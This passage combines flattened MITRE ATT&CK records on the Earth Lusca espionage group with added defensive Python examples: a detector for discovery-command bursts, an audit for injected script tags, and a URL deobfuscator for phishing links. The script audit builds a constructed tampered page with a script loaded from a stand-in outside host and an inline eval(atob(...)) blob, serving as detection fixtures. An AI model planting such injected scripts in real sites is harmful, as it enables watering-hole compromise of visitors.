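The System Owner/User Discovery entry above notes that commands such as whoami, w and who are run during automated discovery to shape follow-on actions. A single whoami is routine administrator behaviour; what stands out is one parent process running several distinct discovery commands within seconds. The following added example (not code from the page, the ATT&CK project or the Trend Micro report) implements that burst rule over constructed process-creation events; the event fields and the 60-second window are assumptions, loosely modelled on Sysmon Event ID 1 records.

```python
"""Detect bursts of user and network discovery commands from one parent process.

Added example, not from the ATT&CK page or the Trend Micro report.
The events below are constructed; field layout and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery binaries named under T1033 / T1016, matched on the bare executable name
DISCOVERY_COMMANDS = {
    "whoami", "w", "who", "id", "dscl", "hostname",
    "ipconfig", "ifconfig", "arp", "nbtstat", "route", "netstat",
}

# Constructed sample events: (timestamp, host, parent_pid, command_line)
SAMPLE_EVENTS = [
    ("2022-03-01T10:00:01", "web01", 4120, "cmd.exe /c whoami"),
    ("2022-03-01T10:00:02", "web01", 4120, "ipconfig /all"),
    ("2022-03-01T10:00:04", "web01", 4120, "arp -a"),
    ("2022-03-01T10:00:05", "web01", 4120, "net user"),      # not in the list, ignored
    ("2022-03-01T10:00:06", "web01", 4120, "whoami /priv"),   # repeat, counted once
    ("2022-03-01T11:30:00", "db02", 883, "whoami"),           # lone whoami: an admin at work
    ("2022-03-01T11:45:00", "db02", 883, "who"),              # 15 minutes later, outside the window
]


def command_name(cmdline):
    """Return the bare executable name from a command line (path and .exe stripped)."""
    tokens = cmdline.split()
    if not tokens:
        return ""
    name = tokens[0]
    # `cmd.exe /c whoami` or `sh -c id`: look past the shell wrapper to the real command
    shells = ("cmd.exe", "cmd", "sh", "bash", "/bin/sh", "/bin/bash")
    if name.lower() in shells and len(tokens) >= 3 and tokens[1] in ("/c", "-c"):
        name = tokens[2]
    name = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name.endswith(".exe"):
        name = name[:-4]
    return name


def detect_discovery_bursts(events, window=timedelta(seconds=60), threshold=3):
    """Alert when one parent process runs at least `threshold` *distinct* discovery
    commands inside `window`. Returns a list of (host, parent_pid, sorted commands)."""
    by_parent = defaultdict(list)
    for ts, host, ppid, cmdline in events:
        name = command_name(cmdline)
        if name in DISCOVERY_COMMANDS:
            by_parent[(host, ppid)].append((datetime.fromisoformat(ts), name))

    alerts = []
    for (host, ppid), seen in by_parent.items():
        seen.sort()
        start = 0
        # sliding window over the time-ordered discovery commands of this parent
        for end in range(len(seen)):
            while seen[end][0] - seen[start][0] > window:
                start += 1
            distinct = {name for _, name in seen[start:end + 1]}
            if len(distinct) >= threshold:
                alerts.append((host, ppid, sorted(distinct)))
                break  # one alert per parent is enough
    return alerts


if __name__ == "__main__":
    for host, ppid, cmds in detect_discovery_bursts(SAMPLE_EVENTS):
        print(f"{host}: parent pid {ppid} ran discovery burst {cmds}")
```

The rule keys on distinct command names rather than raw counts, so a script that calls whoami in a loop does not trip it, while whoami followed by ipconfig and arp within a minute does; tune the window and threshold to the environment's baseline.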
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--b8012238-cfd9-4c5b-8759-8d86f0d6f933 revoked : False technique : Exploit Public-Facing Application technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. 
This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')] technique_id : T1190 matrix : mitre-attack platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers'] data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--4504384f-f832-4ec2-87b0-b8dfc2208083 revoked : False technique : JavaScript technique_description : Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS) JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts) JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. 
As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode) Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027). tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1059.007 matrix : mitre-attack platform : ['Windows', 'macOS', 'Linux'] data_sources : ['Module: Module Load', 'Process: Process Creation', 'Script: Script Execution', 'Command: Command Execution'] permissions_required : ['User', 'Administrator', 'SYSTEM'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. 
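The JavaScript entry above records that the group injected malicious JavaScript into legitimate websites for watering hole operations. The defender-side counterpart is to baseline the scripts a page legitimately carries and alert when an unknown inline script or an external script from an unexpected host appears. The following added example (not code from the page, the ATT&CK project or the Trend Micro report) does that with the standard library: the HTML, the baseline hash set and the allowed host list are all constructed for illustration.

```python
"""Baseline check for injected <script> tags on a monitored page.

Added example, not from the ATT&CK page or the Trend Micro report.
The HTML, baseline hashes and allowed hosts are constructed.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []        # src attribute values
        self.inline = []          # inline script text
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf).strip())
            self._in_script = False


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_scripts(html, allowed_hosts, known_inline_hashes):
    """Return findings: inline scripts whose hash is not in the baseline, and
    external scripts served from hosts outside the allow-list.
    Relative src values resolve to the site itself and are not flagged."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for body in parser.inline:
        digest = sha256_hex(body)
        if digest not in known_inline_hashes:
            findings.append(("unknown-inline", digest, body[:60]))
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:          # relative URL, same origin
            continue
        if host.lower() not in allowed_hosts:
            findings.append(("foreign-src", host.lower(), src))
    return findings


# Constructed known-good page and the baseline derived from it
KNOWN_GOOD_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>window.siteConfig = {lang: "en"};</script>
</head><body>hello</body></html>"""
BASELINE = {sha256_hex('window.siteConfig = {lang: "en"};')}
ALLOWED_HOSTS = {"www.example.org", "cdn.example.org"}

# Constructed tampered copy: one foreign script tag and one inline blob added
TAMPERED_HTML = KNOWN_GOOD_HTML.replace(
    "</head>",
    '<script src="https://stats-collector.example.net/j.js"></script>'
    '<script>eval(atob("ZG9jdW1lbnQubG9jYXRpb249Li4u"));</script></head>')

if __name__ == "__main__":
    for finding in audit_scripts(TAMPERED_HTML, ALLOWED_HOSTS, BASELINE):
        print(finding)
```

Run the audit against a periodic fetch of each monitored page and rebuild the baseline only through the normal release process; a hash set is deliberately strict, so a legitimate change to an inline script shows up as a finding until the baseline is updated. Content Security Policy with nonces or Subresource Integrity on the served page complements this by blocking the injected script in the browser rather than only reporting it.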
[Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails to potential targets that contained a malicious link.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--cff64310-fe63-44ad-9791-d1b4b50f0229 revoked : False technique : Spearphishing Link technique_description : Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It differs from other forms of spearphishing in that the email carries a link to the malware rather than a malicious attachment, which sidesteps defenses that inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user may be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. 
Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. 
(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')] technique_id : T1566.002 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS', 'Google Workspace'] data_sources : ['Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
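The Spearphishing Link entry above lists the URL tricks that make a link look like one site while resolving to another: text before the `@` that the browser discards as userinfo, integer or hexadecimal hostnames, and IDN homographs. The following added example (not code from the page, the ATT&CK project or the Trend Micro report) normalises a link the way a browser would and reports the real destination together with which trick was used; it also handles octal hostnames, which the passage does not mention. The sample URLs are constructed, and `hxxp`/`[.]` are the usual de-fanging that the code reverses first.

```python
"""Reveal the real destination of an obfuscated spearphishing link.

Added example, not from the ATT&CK page or the Trend Micro report.
Sample URLs are constructed; hxxp and [.] are de-fanged notation.
"""
import ipaddress
import re
from urllib.parse import urlsplit


def refang(url):
    """Undo the de-fanging used when sharing indicators."""
    return url.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def decode_numeric_host(host):
    """Turn a bare-integer, 0x-hex or leading-zero octal hostname into a dotted
    quad the way browsers do; return None for ordinary hostnames."""
    try:
        if re.fullmatch(r"0x[0-9a-f]+", host):
            value = int(host, 16)
        elif re.fullmatch(r"0[0-7]+", host):
            value = int(host, 8)
        elif re.fullmatch(r"[0-9]+", host):
            value = int(host)
        else:
            return None
        return str(ipaddress.IPv4Address(value))    # raises if wider than 32 bits
    except (ValueError, ipaddress.AddressValueError):
        return None


def analyze_link(url):
    """Return what the user sees, the host the browser will actually contact,
    and a note for each obfuscation trick detected."""
    parts = urlsplit(refang(url))
    host = parts.hostname or ""          # urlsplit lowercases and strips userinfo
    notes = []
    if parts.username is not None:
        notes.append(f"userinfo '{parts.username}' precedes '@' and hides the real host")
    decoded = decode_numeric_host(host)
    if decoded:
        notes.append(f"numeric host decodes to {decoded}")
        host = decoded
    if host.startswith("xn--") or ".xn--" in host or not host.isascii():
        notes.append("IDN host; compare against known brands for a homograph")
        try:
            host = host.encode("idna").decode("ascii")   # canonical punycode form
        except UnicodeError:
            pass
    return {"display": url, "real_host": host, "notes": notes}


if __name__ == "__main__":
    # the page's own example, plus constructed hex and IDN cases
    for link in ("hxxp://google.com@1157586937",
                 "http://0xc0a80001/login",
                 "https://g\u043e\u043egle.com/"):
        result = analyze_link(link)
        print(result["display"], "->", result["real_host"], result["notes"])
```

Mail gateways and URL-rewriting proxies can apply the same normalisation before reputation lookup, so that `google.com@1157586937` is scored as the IP address 68.255.95.249 and not as google.com.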
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Base64 to encode strings.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--c74dfd33-e17a-4fc7-b2bd-154499fc3ac2 revoked : False technique : Obfuscated Files or Information technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. 
(Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1027 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--e0e8cd30-04d6-457c-b4c1-34145f182dad revoked : False technique : Vulnerability Scanning technique_description : Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. 
Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='reconnaissance')] technique_id : T1595.002 matrix : mitre-attack platform : ['PRE'] data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca 